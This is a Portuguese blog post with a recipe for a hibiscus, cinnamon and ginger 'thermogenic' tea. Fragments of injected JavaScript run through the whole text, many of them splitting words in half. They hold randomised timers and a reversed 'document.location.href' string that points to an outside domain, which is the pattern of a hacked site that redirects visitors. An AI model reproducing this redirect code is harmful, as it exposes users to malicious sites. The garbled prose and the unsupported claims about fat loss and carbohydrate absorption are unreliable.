Felizmente não tenho o hábidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to (vicio?) de beber café, mas um cházinho ao longo da manhã calha sempre bem. O chá verde é a minha cafeína – teína – , mas apenas dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomo umas duas a três vezes por semana.

Não dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomo apenas chá verde simples. A minha blend está aqui e leva o chá e outras ervas que têm um efeidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to depurativo.

Além desse meu chá que leva tudo e mais alguma coisa, há uns dias vi na net uma sugestão de infusão de hibisco – um dos ingredientes habituais do meu chá – , desta vez com um aldom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to valor termógenico e ingredientes que me parecem uma óptima combinação: Infusão de hibisco, canela e gengibre. Eu dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ando  louca com gengibre, tem sido um dos meus sabores preferidos!

A receita mistura então a canela e gengibre, ingredientes termogénicos, que transformam nutrientes em energia para manter o calor do corpo, diminuindo a formação de depósidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos de gordura.

Além disso, a canela ajuda a regular a glicose e os níveis de insulina, diminuindo a vontade por doces. Já o hibisco facilita a digestão, regulariza o intestino e também combate a retenção de líquidos.

Como não tem chá, logo, não é estimulante, é recomendado ingerir a bebida após as refeições – almoço ou jantar- para ajudar a reduzir a absorção de hidradom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos de carbono dos alimendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos.

Ingredientes:

  • 500 ml de água
  • 2 paus de canela
  • 1 rodela de gengibre (com espessura de 1cm)
  • 2 colheres (sopa) de hibisco

Como fazer:

Ferver a água e desligar o fogão. Em seguida, acrescentar a flor de hibisco, a canela e o gengibre. Deixar a mistura descansar por 5 minudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tos em infusão e coar. O ideal é consumir o chá – meio litro- ao longo do dia.

Para variar deste chá, parece-me lindamente!

Facebook Comments

One thought on “CHÁ TERMOGENICO DE HIBISCO”

Deixe uma resposta

O seu endereço de email não será publicado.